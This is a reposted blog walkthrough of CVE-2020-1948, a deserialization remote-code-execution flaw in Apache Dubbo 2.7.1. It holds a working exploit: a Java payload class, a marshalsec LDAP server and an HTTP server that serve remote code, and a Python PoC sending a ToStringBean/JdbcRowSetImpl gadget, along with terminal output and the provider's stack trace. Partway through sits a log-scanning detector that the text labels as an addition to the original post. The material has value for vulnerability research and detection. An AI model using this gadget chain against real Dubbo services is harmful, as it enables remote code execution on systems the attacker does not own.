[CVE-2020-1948] Apache Dubbo Provider default deserialization RCE

2020-06-26 12:40:23  Views: 545  Source: Internet

Tags: Dubbo 1948 java dubbo 1.8 ExploitMac 131 serialization 2.7


git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1

# Import the whole dubbo-spring-boot-project into IDEA
In dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml

add the following dependency:

        <dependency>
            <groupId>com.rometools</groupId>
            <artifactId>rome</artifactId>
            <version>1.7.0</version>
        </dependency>

Change the default port in dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties
to 12347

ExploitMac.java

public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}

terminal 1

[~/Downloads]$ cat ExploitMac.java                                                                                                [23:55:12]
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
[~/Downloads]$ vi ExploitMac.java                                                                                                 [23:43:04]
[~/Downloads]$ javac ExploitMac.java                                                                                              [23:43:17]
[~/Downloads]$ python3 -m http.server 8088                                                                                        [23:43:19]
zsh: correct 'http.server' to 'httpserver' [nyae]? n
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...

127.0.0.1 - - [23/Jun/2020 23:49:27] "GET /ExploitMac.class HTTP/1.1" 200 -

terminal 2

[master][~/GitProjects/marshalsec]$ java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/#ExploitMac 8087
Listening on 0.0.0.0:8087
Send LDAP reference result for ExploitMac redirecting to http://127.0.0.1:8088/ExploitMac.class

terminal 3

$ python3 -m pip install dubbo-py
$ python3 dubbo3.py

PoC

from dubbo.codec.hessian2 import Decoder, new_object
from dubbo.client import DubboClient

# Provider listening on the port configured in application.properties above
client = DubboClient('127.0.0.1', 12347)

# JdbcRowSetImpl whose dataSource points at the marshalsec LDAP server (terminal 2);
# its getDatabaseMetaData() getter performs the JNDI lookup
JdbcRowSetImpl = new_object(
    'com.sun.rowset.JdbcRowSetImpl',
    dataSource="ldap://127.0.0.1:8087/ExploitMac",
    strMatchColumns=["foo"]
)
JdbcRowSetImplClass = new_object(
    'java.lang.Class',
    name="com.sun.rowset.JdbcRowSetImpl",
)
# ToStringBean (from the rome dependency added above) calls every getter of obj
# when toString() runs, which happens inside RpcInvocation.toString() on the provider
toStringBean = new_object(
    'com.rometools.rome.feed.impl.ToStringBean',
    beanClass=JdbcRowSetImplClass,
    obj=JdbcRowSetImpl
)

resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    method_name='rce',
    args=[toStringBean])

Error reported in IDEA

2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString

java.lang.reflect.InvocationTargetException: null
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_131]
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_131]
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_131]
	at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_131]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:129) [rome-1.7.0.jar:1.7.0]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.util.Arrays.toString(Arrays.java:4571) [na:1.8.0_131]
	at org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.lang.StringBuilder.append(StringBuilder.java:131) [na:1.8.0_131]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:103) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:200) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:51) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:57) [dubbo-2.7.1.jar:2.7.1]
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) [na:1.8.0_131]
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) [na:1.8.0_131]
	at java.lang.Thread.run(Thread.java:748) [na:1.8.0_131]
Caused by: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
	at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
	at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004) ~[na:1.8.0_131]
	... 20 common frames omitted
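The trace above is what a provider leaves behind when this chain fires: a ToStringBean "Error while generating toString" on a Dubbo worker thread, a frame in RpcInvocation.toString, and a JdbcRowSetImpl.connect frame in the cause. As an added defender-side example (not part of the original post), this scanner groups provider log lines into traces and flags only those that show both marker frames together; the sample log is constructed from the trace above plus a benign ToStringBean error that must not be flagged.

```python
import re

# Constructed sample: the trace from the post (abridged) plus a benign
# ToStringBean error on another thread that must NOT be flagged.
SAMPLE_LOG = [
    "2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString",
    "",
    "java.lang.reflect.InvocationTargetException: null",
    "\tat com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]",
    "\tat org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]",
    "\tat org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]",
    "Caused by: java.sql.SQLException: JdbcRowSet (connect) JNDI unable to connect",
    "\tat com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]",
    "\t... 20 common frames omitted",
    "2020-06-23 23:50:01.000 ERROR 66497 --- [12347-thread-18] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString",
    "java.lang.reflect.InvocationTargetException: null",
    "\tat com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]",
    "\tat com.example.FeedPrinter.dump(FeedPrinter.java:10) [app.jar:1.0]",
]

# Header of the error that ToStringBean logs when a getter throws.
ERROR_START = re.compile(
    r"^(?P<ts>\S+ \S+)\s+ERROR .*?\[(?P<thread>[^\]]+)\].*ToStringBean\s*: Error while generating toString")
# The two frames that, together, mark a gadget being stringified during dispatch.
TOSTRING_FRAME = "org.apache.dubbo.rpc.RpcInvocation.toString"
JNDI_FRAME = "com.sun.rowset.JdbcRowSetImpl.connect"


def group_traces(lines):
    """Attach each error header to the exception/stack lines that follow it."""
    groups, current = [], None
    for line in lines:
        if ERROR_START.search(line):
            current = {"header": line, "frames": []}
            groups.append(current)
        elif current is not None and line[:1] in ("\t", "C", "j"):
            # "\tat ...", "Caused by: ..." and "java.lang...." lines belong to the trace
            current["frames"].append(line)
    return groups


def find_suspected_exploits(lines):
    """Return one finding per trace that shows both marker frames."""
    findings = []
    for group in group_traces(lines):
        frames = "\n".join(group["frames"])
        if TOSTRING_FRAME in frames and JNDI_FRAME in frames:
            header = ERROR_START.search(group["header"])
            findings.append({"time": header.group("ts"), "thread": header.group("thread"),
                             "reason": "RpcInvocation.toString() reached JdbcRowSetImpl.connect (JNDI)"})
    return findings
```

Pair a hit with the Wireshark captures on ports 12347 and 8087 shown below to confirm the inbound Dubbo request and the outbound LDAP lookup; a provider that has no legitimate reason to reach an LDAP server should never produce this trace.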

Wireshark: 8087

[screenshot]

Wireshark: 12347

[screenshot]

Demo

[screenshot]

References

  • https://mp.weixin.qq.com/s/iKQbdWrMG00Arg0aEUbrXQ
  • https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html

Source: https://blog.csdn.net/caiqiiqi/article/details/106934770
